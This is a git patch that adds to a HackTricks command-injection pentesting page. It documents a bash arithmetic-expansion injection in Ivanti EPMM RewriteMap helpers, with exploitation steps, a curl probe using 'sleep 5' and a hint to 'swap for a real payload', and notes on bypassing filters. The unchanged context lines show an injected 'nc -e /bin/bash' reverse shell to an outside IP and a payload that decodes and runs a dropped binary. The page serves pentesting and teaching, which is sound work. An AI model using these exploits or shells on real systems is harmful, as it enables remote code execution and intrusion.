From 39e239244cf60e973ee8dbd1e02a4a2d8c37a694 Mon Sep 17 00:00:00 2001
From: HackTricks News Bot <bot@hacktricks.xyz>
Date: Wed, 18 Feb 2026 02:03:29 +0000
Subject: [PATCH] Add content from: Critical Vulnerabilities in Ivanti EPMM
 Exploited

---
 src/pentesting-web/command-injection.md | 28 +++++++++++++++++++++++++
 1 file changed, 28 insertions(+)

diff --git a/src/pentesting-web/command-injection.md b/src/pentesting-web/command-injection.md
index fab61eb2a4d..13d7d7532b2 100644
--- a/src/pentesting-web/command-injection.md
+++ b/src/pentesting-web/command-injection.md
@@ -49,6 +49,33 @@ vuln=127.0.0.1%0anohup nc -e /bin/bash 51.15.192.49 80
 vuln=echo PAYLOAD > /tmp/pay.txt; cat /tmp/pay.txt | base64 -d > /tmp/pay; chmod 744 /tmp/pay; /tmp/pay
 ```
 
+### Bash arithmetic evaluation in RewriteMap/CGI-style scripts
+
+RewriteMap helpers written in **bash** sometimes push query params into globals and later compare them in **arithmetic contexts** (`[[ $a -gt $b ]]`, `$((...))`, `let`). Arithmetic expansion re-tokenizes the content, so attacker-controlled variable names or array references are expanded twice and can execute.
+
+**Pattern seen in Ivanti EPMM RewriteMap helpers:**
+
+1. Params map to globals (`st` → `gStartTime`, `h` → `theValue`).
+2. Later check:
+   ```bash
+   if [[ ${theCurrentTimeSeconds} -gt ${gStartTime} ]]; then
+       ...
+   fi
+   ```
+3. Send `st=theValue` so `gStartTime` points to the string `theValue`.
+4. Send `h=gPath['sleep 5']` so `theValue` contains an array index; during the arithmetic check it runs `sleep 5` (swap for a real payload).
+
+Probe (~5s delay then 404 if vulnerable):
+
+```bash
+curl -k "https://TARGET/mifs/c/appstore/fob/ANY?st=theValue&h=gPath['sleep 5']"
+```
+
+Notes:
+
+- Look for the same helper under other prefixes (e.g., `/mifs/c/aftstore/fob/`).
+- Arithmetic contexts treat unknown tokens as variable/array identifiers, so this bypasses simple metacharacter filters.
+
 ### Parameters
 
 Here are the top 25 parameters that could be vulnerable to code injection and similar RCE vulnerabilities (from [link](https://twitter.com/trbughunters/status/1283133356922884096)):
@@ -240,5 +267,6 @@ https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_inject
 - [When WebSockets Lead to RCE in CurseForge](https://elliott.diy/blog/curseforge/)
 - [PaperCut NG/MF SetupCompleted auth bypass → print scripting RCE](https://0xdf.gitlab.io/2026/02/03/htb-bamboo.html)
 - [CVE-2023-27350.py (auth bypass + print scripting automation)](https://github.com/horizon3ai/CVE-2023-27350/blob/main/CVE-2023-27350.py)
+- [Unit 42 – Bash arithmetic expansion RCE in Ivanti RewriteMap scripts](https://unit42.paloaltonetworks.com/ivanti-cve-2026-1281-cve-2026-1340/)
 
 {{#include ../banners/hacktricks-training.md}}